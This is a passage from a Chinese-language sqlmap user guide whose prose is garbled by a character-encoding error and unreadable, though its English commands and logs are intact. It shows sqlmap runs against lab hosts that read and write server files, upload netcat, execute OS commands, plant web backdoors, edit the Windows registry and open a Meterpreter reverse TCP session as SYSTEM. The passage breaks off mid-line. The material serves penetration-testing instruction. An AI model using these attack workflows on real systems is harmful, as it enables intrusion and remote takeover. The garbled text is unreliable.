UDF鏄€渦ser-defined function鈥濈殑缂╁啓锛孶DF鏄竴绉嶉拡瀵筂ySQL鍜孭ostgreSQL鐨勯珮绾ф敞鍏ユ妧鏈紝璇︽儏瑙併€夾dvanced SQL injection to operating system full control銆嬨€?
鍙互缂栬瘧MySQL鎴朠ostgreSQL鐨勫叡浜簱銆丏LL锛圵indows锛夊拰鍏变韩瀵硅薄锛圠inux/Unix锛夊苟灏嗚繖浜涙枃浠跺湪鏈満涓婄殑璺緞鎻愪緵缁橲qlmap鏉ヨ繘琛孶DF娉ㄥ叆銆? Sqlmap浼氬厛闂竴浜涢棶棰樼劧鍚庝笂浼燯DF鏂囦欢骞跺垱寤篣DF鏈€鍚庢牴鎹棶棰樼瓟妗堟墽琛孶DF銆傚畬鎴怳DF娉ㄥ叆鍚庯紝Sqlmap浼氬垹闄や笂浼犵殑UDF鏂囦欢銆?
鍙傛暟锛氣€搒hared-lib
娣诲姞姝ゅ弬鏁癝qlmap浼氬湪杩愯鏃惰闂叡浜簱鏂囦欢璺緞銆?
鍦⊿qlmap瀹夎鐩綍鐨剈df鐩綍涓湁璁稿UDF鏂囦欢锛屾寜鐓MBS銆佹搷浣滅郴缁熴€佷綅鏁板拰鐗堟湰褰掔被锛屽彲浠ョ洿鎺ヤ娇鐢ㄣ€?
鍗佷簲銆佽闂枃浠剁郴缁?/h3>
1.璇诲彇鏂囦欢
鍙傛暟锛氣€揻ile-read
褰撴暟鎹簱绠$悊绯荤粺鏄疢ySQL銆丳ostgreSQL鎴栧井杞殑SQL Server涓斿綋鍓嶇敤鎴锋湁璇诲彇鏂囦欢鐩稿叧鏉冮檺鏃惰鍙栨枃浠舵槸鍙鐨勩€? 璇诲彇鐨勬枃浠舵棦鍙互鏄枃浠舵枃浠朵篃鍙互鏄簩杩涘埗鏂囦欢锛孲qlmap浼氬鐞嗗ソ鐨勩€備笅渚嬬殑鐩爣鏁版嵁搴撶鐞嗙郴缁熸槸SQL Server 2005锛?
python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" --file-read "C:/example.exe" -v 1
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
C:/example.exe file saved to:
'/software/sqlmap/output/192.168.136.129/files/C__example.exe'
$ ls -l output/192.168.136.129/files/C__example.exe
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe
$ file output/192.168.136.129/files/C__example.exe
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
2.涓婁紶鏂囦欢
鍙傛暟锛氣€揻ile-write鍜屸€揻ile-dest
褰撴暟鎹簱绠$悊绯荤粺鏄疢ySQL銆丳ostgreSQL鎴栧井杞殑SQL Server涓斿綋鍓嶇敤鎴锋湁鍐欐枃浠剁浉鍏虫潈闄愭椂涓婁紶鏂囦欢鏄彲琛岀殑銆? 涓婁紶鐨勬枃浠舵棦鍙互鏄枃浠舵枃浠朵篃鍙互鏄簩杩涘埗鏂囦欢锛孲qlmap浼氬鐞嗗ソ鐨勩€備笅渚嬬殑鐩爣鏁版嵁搴撶鐞嗙郴缁熸槸MySQL锛屼笂浼犱簡涓€涓簩杩涘埗鐨刄PX鍘嬬缉鏂囦欢锛?
$ file /software/nc.exe.packed
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit
$ ls -l /software/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" -\
-file-write "/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
[...]
[hh:mm:29] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL >= 5.0.0
[...]
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been success
fully written on the back-end DBMS file system? [Y/n] y
[hh:mm:52] [INFO] retrieved: 31744
[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 b
ytes, same size as the local file '/software/nc.exe.packed'
鍗佸叚銆佹搷浣滅郴缁熸帶鍒?/h3>
1.鎵ц浠绘剰鎿嶄綔绯荤粺鍛戒护
鍙傛暟锛氣€搊s-cmd鍜屸€搊s-shell
鑻ユ暟鎹簱绠$悊绯荤粺鏄疢ySQL銆丳ostgreSQL鎴栧井杞殑SQL Server涓斿綋鍓嶇敤鎴锋湁鐩稿叧鏉冮檺Sqlmap灏辫兘鍒╃敤SQL娉ㄥ叆鎵ц浠绘剰鐨勬搷浣滅郴缁熷懡浠ゃ€?
褰撴暟鎹簱绠$悊绯荤粺鏄疢ySQL鎴朠ostgreSQL鏃讹紝Sqlmap浼氶€氳繃鍓嶉潰浠嬬粛杩囩殑鏂囦欢涓婁紶鍔熻兘涓婁紶涓€涓寘鍚敤鎴疯嚜瀹氫箟鍑芥暟sys_exec()鍜宻ys_eval()鐨勪簩杩涘埗鍏变韩搴撴枃浠讹紝鐒跺悗鍒涘缓杩欎袱涓敤鎴疯嚜瀹氫箟鍑芥暟锛岄€氳繃杩欎袱涓嚱鏁颁箣涓€鏉ユ墽琛岀敤鎴锋寚瀹氱殑鍛戒护銆傞€夋嫨鍝釜鍑芥暟鍙栧喅浜庣敤鎴锋槸鍚︽兂瑕佹樉绀哄懡浠ゆ墽琛岀殑鏍囧噯杈撳嚭銆?
褰撴暟鎹簱绠$悊绯荤粺鏄井杞殑SQL Server鏃讹紝Sqlmap閫氳繃瀛樺偍杩囩▼xp_cmdshell鏉ユ墽琛屼换鎰忓懡浠ゃ€? 鑻p_cmdshell琚鐢紙SQL Server >= 2005鏃堕粯璁ょ鐢級Sqlmap浼氬惎鐢ㄥ畠锛? 鑻p_cmdshell涓嶅瓨鍦紝Sqlmap浼氬垱寤哄畠銆?
褰撶敤鎴锋兂瑕佺湅鍒板懡浠ゆ墽琛岀殑鏍囧噯杈撳嚭鏃讹紝Sqlmap浣跨敤鍙垪涓剧殑娉ㄥ叆鎶€鏈紙鐩叉敞銆佸甫鍐呭拰鍩轰簬閿欒鐨勬敞鍏ワ級锛岃€屽綋鐢ㄦ埛涓嶆兂鐪嬪埌鍛戒护鎵ц鐨勬爣鍑嗚緭鍑烘椂锛屽爢鏌ヨ娉ㄥ叆鎶€鏈皢琚敤浜庢墽琛屽懡浠ゃ€?
涓嬩緥鐨勭洰鏍囨槸PostgreSQL锛?
python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --os-cmd id -v 1
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
[hh:mm:12] [INFO] testing if current user is DBA
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
'uid=104(postgres) gid=106(postgres) groups=106(postgres)'
[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] y
do you want to remove UDF 'sys_exec'? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can only be deleted manually
浣跨敤鍙傛暟鈥溾€搊s-shell鈥濆彲浠ユā鎷熶竴涓彲浠ユ墽琛屼换鎰忓懡浠ょ殑shell锛屽拰鈥溾€搒ql-shell鈥濅竴鏍疯繖涓猻hell涔熷彲浠ョ敤Tab閿ˉ鍏紝鏀寔鍘嗗彶璁板綍銆?
褰撳爢鏌ヨ涓嶈鏀寔锛堝PHP鎴朅SP+Mysql锛変笖鏁版嵁搴撶鐞嗙郴缁熸槸MySQL鏃讹紝浠嶇劧鍙互閫氳繃SELECT鐨勪粠鍙NTO OUTFILE鍦╓eb鎵€鍦ㄤ富鏈虹殑鍙啓鐩綍鍒涘缓涓€涓猈eb鍚庨棬锛岄€氳繃杩欎釜Web鍚庨棬鏉ユ墽琛屽懡浠ゃ€係qlmap鏀寔杩欎竴鎶€鏈苟瑕佹眰鐢ㄦ埛鎻愪緵涓€浜涚敤閫楀彿鍒嗗壊鐨勫彲鑳芥槸鍙啓鐩綍鐨勮矾寰勩€係qlmap鏀寔浠ヤ笅杩欎簺鏈嶅姟鍣ㄧ鑴氭湰璇█锛?
- ASP
- ASP.NET
- JSP
- PHP
2.甯﹀TCP杩炴帴锛歁eterpreter鍙婄浉鍏?
鍙傛暟锛氣€搊s-pwn銆佲€搊s-smbrelay銆佲€搊s-bof銆佲€損riv-esc銆佲€搈sf-path鍜屸€搕mp-path
鑻ユ暟鎹簱绠$悊绯荤粺鏄疢ySQL銆丳ostgreSQL鎴栧井杞殑SQL Server涓斿綋鍓嶇敤鎴锋湁鐩稿叧鏉冮檺Sqlmap灏辨湁鍙兘鍦ㄦ敾鍑昏€呯殑涓绘満鍜屾暟鎹簱鎵€鍦ㄤ富鏈轰箣闂村缓绔嬪甫澶朤CP杩炴帴銆傛牴鎹敤鎴风殑閫夋嫨锛屾杩炴帴鍙互鏄氦浜掑紡鍛戒护shell锛孧eterpreter浼氳瘽鎴栧浘褰㈢敤鎴风晫闈紙VNC锛変細璇濄€?
Sqlmap瑕侀潬Metasploit鐢熸垚shellcode锛屽湪鏁版嵁搴撴墍鍦ㄤ富鏈烘墽琛宻hellcode鏈変互涓嬪洓绉嶆妧鏈細
- 鏁版嵁搴撻€氳繃Sqlmap鍒涘缓鐨勭敤鎴疯嚜瀹氫箟鍑芥暟sys_bineval()鍦ㄥ唴瀛樹腑鎵цMetasploit鐨剆hellcode銆傛敮鎸丮ySQL鍜孭ostgreSQL銆傚弬鏁扳€溾€搊s-pwn鈥濄€?/li>
- 閫氳繃Sqlmap鑷繁鐨勭敤鎴疯嚜瀹氫箟鍑芥暟锛圡ySQL鍜孭ostgreSQL涓殑sys_exec()锛屽井杞疭QL Server涓殑xp_cmdshell()锛変笂浼犲苟鎵цMetasploit鐨勨€渟tand-alone payload stager鈥濄€傚弬鏁帮細鈥溾€搊s-pwn鈥濄€?/li>
- 鍒╃敤杩滅▼浠g爜鎵ц婕忔礊MS08-068銆傛敾鍑昏€呯殑鏈哄櫒瑕佺敤Metasploit鐨剆mb_relay鐩戝惉鏉ヨ嚜鐩爣鏈哄櫒鐨勮繛鎺ャ€傝姹傚湪Linux/Unix涓婁互root鏉冮檺杩愯Sqlmap涓旂洰鏍嘍BMS鍦╓indows涓婁互绠$悊鍛樻潈闄愯繍琛屻€傚弬鏁帮細鈥溾€搊s-smbrelay鈥濄€?/li>
- 鍦ㄥ井杞疭QL Server 2000鍜?005涓彲閫氳繃瀛樺偍杩囩▼sp_replwritetovarbin鐨勫爢缂撳啿鍖烘孩鍑烘紡娲烇紙MS09-004锛夊湪鍐呭瓨涓墽琛孧etasploit鐨剆hellcode銆係qlmap鏈夎嚜宸辩殑鏁版嵁鎵ц淇濇姢缁曡繃鎶€鏈彲浠ユ垚鍔熷埄鐢ㄦ紡娲烇紝浣嗛渶瑕丮etasploit鐢熸垚shellcode浠ヤ究鍦ㄦ垚鍔熷埄鐢ㄦ紡娲炴椂鎵цshellcode銆傚弬鏁帮細鈥溾€搊s-bof鈥濄€?/li>
python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit
[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database und
erlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on
all ports
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>
which is the local address? [192.168.136.1]
which local port number do you want to use? [60641]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..
=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 674 exploits - 351 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12272 updated 4 days ago (2011.04.07)
PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11 hh:mm:52 +0100 2011
meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > [-] The 'priv' extension has already been loaded.
meterpreter > Loading extension sniffer...success.
meterpreter > System Language : en_US
OS : Windows .NET Server (Build 3790, Service Pack 2).
Computer : W2K3R2
Architecture : x86
Meterpreter : x86/win32
meterpreter > Server username: NT AUTHORITY\SYSTEM
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:fc:79:39
IP Address : 192.168.136.129
Netmask : 255.255.255.0
meterpreter > exit
[*] Meterpreter session 1 closed. Reason: User exit
鍦╓indows涓璏ysql榛樿浠YSTEM韬唤杩愯锛屼絾PostgreSQL鏃犺鏄湪Windows杩樻槸鍦↙inux涓兘浠ヤ綆鏉冮檺鐨勭敤鎴穚ostgres杩愯銆係QL Server 2000榛樿浠YSTEM韬唤杩愯锛屼絾SQL Server 2005鍒?008澶у鏁版椂闂翠互NETWORK SERVICE韬唤杩愯锛屽皯鏁版椂鍊欎互LOCAL SERVICE韬唤杩愯銆?
浣跨敤鍙傛暟鈥溾€損riv-esc鈥濆彲浠ユ墽琛孧etasploit鐨刧etsystem鍛戒护浠ュ皾璇曟彁鍗囨潈闄愩€?
鍗佷竷銆乄indows娉ㄥ唽琛ㄦ搷浣?/h3>
婊¤冻浠ヤ笅鏉′欢灏卞彲浠ュWindows娉ㄥ唽琛ㄨ繘琛屾搷浣滐細
- 鐩爣鏁版嵁搴撶鐞嗙郴缁熸槸杩愯鍦╓indows涓婄殑
- 鐩爣鏁版嵁搴撶鐞嗙郴缁熸槸MySQL銆丳ostgreSQL鎴栧井杞疭QL Server
- 鏀寔鍫嗘煡璇?/li>
- 鐩爣鏁版嵁搴撶鐞嗙郴缁熷綋鍓嶇敤鎴锋湁瓒冲鐨勬潈闄?/li>
1.璇籛indows娉ㄥ唽琛ㄩ敭鍊?
鍙傛暟锛氣€搑eg-read
2.鍐橶indows娉ㄥ唽琛ㄩ敭鍊?
鍙傛暟锛氣€搑eg-add
3.鍒犻櫎Windows娉ㄥ唽琛ㄩ敭鍊?
鍙傛暟锛氣€搑eg-del
4.杈呭姪
鍙傛暟锛氣€搑eg-key銆佲€搑eg-value銆佲€搑eg-data鍜屸€搑eg-type
閫傚綋浣跨敤涓婂垪鍙傛暟灏卞彲浠ュ湪鍛戒护涓坊鍔犳垨淇敼涓€涓猈indows娉ㄥ唽琛ㄩ敭鍊艰€屼笉鐢ㄥ湪Sqlmap杩愯鏃朵互闂瓟鏂瑰紡鎻愪緵鏁版嵁銆?
- 鈥搑eg-key锛氭寚瀹歐indows娉ㄥ唽琛ㄩ敭鍊肩殑璺緞
- 鈥搑eg-value锛氭寚瀹歐indows娉ㄥ唽琛ㄩ敭鍊肩殑閿?/li>
- 鈥搑eg-data锛氭寚瀹歐indows娉ㄥ唽琛ㄩ敭鍊肩殑鍊?/li>
- 鈥搑eg-type锛氭寚瀹歐indows娉ㄥ唽琛ㄩ敭鍊肩殑鍊肩殑鏁版嵁绫诲瀷
python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
鍗佸叓銆侀€氱敤閫夐」
1.浠嶴QLite鏂囦欢涓浇鍏qlmap浼氳瘽
鍙傛暟锛?s
Sqlmap浼氳嚜鍔ㄥ湴涓烘瘡涓€涓洰鏍囧垱寤洪暱涔呬繚瀛樼殑浼氳瘽SQLite鏂囦欢锛岃鏂囦欢缁熶竴瀛樺偍鍦ㄧ壒瀹氱洰褰曪紙濡傦細~/.sqlmap/output/锛変腑锛屽叾涓繚瀛樼潃鎭㈠浼氳瘽鎵€闇€鐨勬墍鏈夋暟鎹€傝嫢鐢ㄦ埛鎯宠鏄庣‘鍦版寚瀹歋QLite鏂囦欢锛堜緥濡傛兂瑕佸皢澶氫釜鐩爣鐨勬暟鎹瓨鍌ㄥ埌鍚屼竴涓猄QLite鏂囦欢涓級锛屽彲浣跨敤姝ゅ弬鏁般€?
2.灏咹TTP(S)娴侀噺璁板綍鍒版棩蹇楁枃浠朵腑
鍙傛暟锛?t
璇ュ弬鏁板悗璺熶竴涓枃浠惰矾寰勶紝鐢ㄤ簬灏咹TTP(S)璇锋眰鍜屽搷搴斾互鏂囨湰鏍煎紡璁板綍鍒版枃浠朵腑浣滀负鏃ュ織銆傝繖鏍风殑鏃ュ織鍦ㄨ皟璇曟椂鏄緢鏈夌敤鐨勩€?
3.闈炰氦浜掓ā寮?
鍙傛暟锛氣€揵atch
浣跨敤璇ュ弬鏁板彲浠ヨSqlmap浠ラ潪浜や簰妯″紡杩愯锛屾墍鏈夎姹傜殑杈撳叆閮戒細鍙栭粯璁ゅ€笺€?
4.璁剧疆瀛楃缂栫爜
鍙傛暟锛氣€揷harset
涓烘纭В鐮佹暟鎹紝Sqlmap浼氫娇鐢╓eb鏈嶅姟鍣ㄦ彁渚涚殑淇℃伅锛堝HTTP澶撮儴涓瓧绗︾紪鐮佺殑璁剧疆锛夛紝鎴栨槸浣跨敤绗笁鏂瑰簱chardet鏉ュ惎鍙戝紡鍦扮‘瀹氬瓧绗︾紪鐮併€?
鍙互浣跨敤鍙傛暟鈥溾€揷harset鈥濇潵鎸囧畾瀛楃缂栫爜锛屽鈥溾€揷harset=GBK鈥濄€?
5.浠庣洰鏍嘦RL寮€濮嬬埇鍙栫洰鏍囩珯鐐?
鍙傛暟锛氣€揷rawl
Sqlmap鍙互浠庣洰鏍嘦RL寮€濮嬬埇鍙栫洰鏍囩珯鐐瑰苟鏀堕泦鍙兘瀛樺湪婕忔礊鐨刄RL銆備娇鐢ㄨ鍙傛暟杩橀渶瑕佽缃埇鍙栨繁搴︼紝娣卞害鏄浉瀵逛簬寮€濮嬬埇鍙栫殑鐩爣URL鑰岃█鐨勩€傚彧鏈夋墍鏈夋柊閾炬帴閮借閫掑綊鍦拌闂繃鍚庢墠绠楃埇鍙栫粨鏉熴€傚缓璁鍙傛暟涓庘€溾€揹elay鈥濋厤鍚堜娇鐢ㄣ€?
涓嬩緥鐨勭洰鏍囩殑MySQL锛?
python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3
[xx:xx:53] [INFO] starting crawler
[xx:xx:53] [INFO] searching for links with depth 1
[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
[xx:xx:53] [INFO] searching for links with depth 2
[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:00] [INFO] 42/56 links visited (75%)
鍙傛暟锛氣€揷rawl-exclude
鍦ㄦ鍙傛暟鍚庤窡涓€涓鍒欒〃杈惧紡鍙互鎺掗櫎涓嶆兂鐖彇鐨刄RL銆傝嫢URL鍖归厤姝e垯锛屽垯涓嶈鐖彇銆傚鐢ㄢ€溾€揷rawl-exclude=logout鈥濇潵鎺掗櫎鎵€鏈夊惈鏈夊瓧绗︿覆鈥渓ogout鈥濈殑URL銆?
6.璁剧疆杈撳嚭CSV鏂囦欢涓殑鍒嗛殧绗?
鍙傛暟锛氣€揷sv-del
褰撴暟鎹杈撳嚭鍒癈SV鏂囦欢锛堚€揹ump-format=CSV锛夋椂锛岄粯璁や互鈥?鈥濆垎闅旓紝鍙互浣跨敤姝ゅ弬鏁版寚瀹氬垎闅旂銆傚锛氣€溾€揷sv-del=鈥?鈥濃€濄€?
7.鏁版嵁搴撶鐞嗙郴缁熻璇佸嚟鎹?
鍙傛暟锛氣€揹bms-cred
鍦ㄦ煇浜涙儏鍐典笅鐢变簬鏁版嵁搴撶鐞嗙郴缁熷綋鍓嶇敤鎴锋潈闄愯緝浣庝粠鑰屽鑷村姩浣滄墽琛屽け璐ワ紝姝ゆ椂鍙互鐢ㄦ鍙傛暟鎻愪緵admin鐢ㄦ埛璁よ瘉鍑嵁锛孲qlmap灏变細瀵规墽琛屽け璐ョ殑閮ㄥ垎鐗瑰湴浣跨敤鈥渞un as鈥濇満鍒讹紙濡傦細寰蒋SQL Server鐨凮PENROWSET锛変互admin鐢ㄦ埛韬唤閲嶆柊鎵ц澶辫触鐨勫姩浣溿€傚綋鐒讹紝寰楃煡閬揳dmin鐢ㄦ埛璁よ瘉鍑嵁鎵嶈銆?
8.鏁版嵁杈撳嚭鏍煎紡
鍙傛暟锛氣€揹ump-format
Sqlmap瀵瑰垪涓剧殑鏁版嵁鏈変笁绉嶄笉鍚岀殑杈撳嚭鏍煎紡锛欳SV銆丠TML鍜孲QLITE銆傞粯璁や负CSV鏍煎紡锛屾瘡涓暟鎹〃閮借淇濆瓨鍒颁竴涓枃鏈枃浠朵腑锛屼竴琛屾槸涓€鏉¤褰曪紝浠ラ€楀彿鍒嗛殧锛堟垨鏄敤鈥溾€揷sv-del鈥濇寚瀹氬垎闅旂锛夈€傞€夋嫨HTML鏍煎紡锛屾墍鏈夋暟鎹淇濆瓨鍦ㄤ竴涓狧TML鏂囦欢涓紝鏁版嵁瀛樻斁鍦ㄤ竴涓釜table涓€傞€夋嫨SQLITE鏍煎紡锛屾墍鏈夋暟鎹淇濆瓨鍦ㄤ竴涓猄QLITE鏂囦欢涓紝SQLITE涓〃鍚嶅拰缁撴瀯浼氬拰鍘熻〃鐩稿悓銆?
9.浼拌瀹屾垚鏃堕棿
鍙傛暟锛氣€揺ta
璇ュ弬鏁扮敤浜庢樉绀轰及璁$殑瀹屾垚鏃堕棿銆備笅渚嬫槸鐩爣涓篛racle鐨勫竷灏斿瀷鐩叉敞锛?
python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta
[hh:mm:01] [INFO] the back-end DBMS is Oracle
[hh:mm:01] [INFO] fetching banner
[hh:mm:01] [INFO] retrieving the length of query output
[hh:mm:01] [INFO] retrieved: 64
17% [========> ] 11/64
Then:
100% [===================================================] 64/64
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner:
'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
濡備綘鎵€瑙侊紝Sqlmap鍏堣绠楁煡璇㈣緭鍑虹殑闀垮害锛岀劧鍚庝及璁″畬鎴愭椂闂达紝鏈€鍚庢樉绀虹櫨鍒嗘瘮杩涘害鏉″苟缁熻宸茬粡鎺ュ彈鐨勬暟鎹€?
10.鍒锋柊浼氳瘽鏂囦欢
鍙傛暟锛氣€揻lush-session
浣跨敤璇ュ弬鏁板彲浠ュ埛鏂颁細璇濇枃浠讹紝浠ラ伩鍏峉qlmap榛樿鐨勭紦瀛樻満鍒跺彲鑳介€犳垚鐨勪竴浜涢棶棰樸€備娇鐢ㄨ鍙傛暟鐨勫墠鎻愭槸鐪熸鐞嗚В浼氳瘽鏂囦欢鐨勬蹇点€傚彟澶栦竴涓彲琛岀殑鏂规硶鏄墜宸ュ垹闄や細璇濇枃浠躲€?
11.瑙f瀽鍜屾祴璇曡〃鍗曡緭鍏ュ瓧娈?
鍙傛暟锛氣€揻orms
闄や簡鐢ㄢ€?r鈥濆拰鈥溾€揹ata鈥濇潵娴嬭瘯琛ㄥ崟鏁版嵁鏄惁瀛樺湪娉ㄥ叆鐐瑰锛岃繕鍙互浣跨敤鍙傛暟鈥溾€揻orms鈥濇潵娴嬭瘯琛ㄥ崟鏁版嵁鏄惁瀛樺湪娉ㄥ叆鐐广€?
鍚屾椂浣跨敤鍙傛暟鈥溾€揻orms鈥濆拰鈥?u鈥濓紝Sqlmap浼氳В鏋愮洰鏍嘦RL锛堚€?u鈥濇寚瀹氱殑閭d釜URL锛夎繑鍥為〉闈腑鐨勮〃鍗曪紝娴嬭瘯琛ㄥ崟鏄惁鏈夋敞鍏ョ偣锛岃€屼笉瀵圭洰鏍嘦RL杩涜娉ㄥ叆娴嬭瘯銆?
12.蹇界暐浼氳瘽鏂囦欢涓殑鏌ヨ缁撴灉
鍙傛暟锛?fresh-queries
浣跨敤姝ゅ弬鏁扮敤浜庡拷鐣ヤ細璇濇枃浠朵腑鐨勬煡璇㈢粨鏋滈噸鏂版墽琛屾煡璇€?
13.瀵硅繑鍥炵粨鏋滀娇鐢℉EX鍑芥暟
鍙傛暟锛氣€揾ex
闈濧SCII鏁版嵁寰堝鏄撳湪浼犺緭鏃跺嚭閿欙紝浣跨敤hex鍑芥暟鍙互灏嗙洰鏍囨暟鎹簱涓暟鎹互鍗佸叚杩涘埗杩斿洖銆?
涓嬩緥鐨勭洰鏍囨槸PostgreSQL锛?
python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors
[xx:xx:14] [INFO] fetching banner
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR
(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
[xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'>function.pg-query</a>]: Query failed: ERROR: invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>'
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by
GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
14.鎸囧畾杈撳嚭鐩綍璺緞
鍙傛暟锛氣€搊utput-dir
Sqlmap榛樿灏嗕細璇濇枃浠跺拰缁撴灉鏂囦欢淇濆瓨鍒版煇涓瓙鐩綍output涓紝鍙互浣跨敤姝ゅ弬鏁版寚瀹氳緭鍑虹洰褰曪紝濡傦細鈥溾€搊utput-dir=/tmp鈥濄€?
15.浠庡搷搴斾腑瑙f瀽DBMS鐨勯敊璇俊鎭?
鍙傛暟锛氣€損arse-errors
鑻ユ槸Web搴旂敤琚厤缃垚Debug妯″紡鍒欏緢鍙兘鍦℉TTP鍝嶅簲椤甸潰涓樉绀篠QL閿欒淇℃伅銆傝繖浜涢敊璇俊鎭浜庣悊瑙f煇鎿嶄綔澶辫触鐨勫師鍥犳槸寰堟湁鐢ㄧ殑銆備緥濡傚洜涓烘潈闄愪笉瓒冲鑷寸殑澶辫触閿欒淇℃伅鏄被浼艰繖鏍风殑锛氣€淎ccess denied for user 鈥濄€?
涓嬩緥鐨勭洰鏍囨槸寰蒋SQL Server锛?
python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors
[xx:xx:17] [INFO] ORDER BY technique seems to be usable. This should reduce the timeneeded to find the right number of query columns. Automatically extending the rangefor current UNION query injection technique test
[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
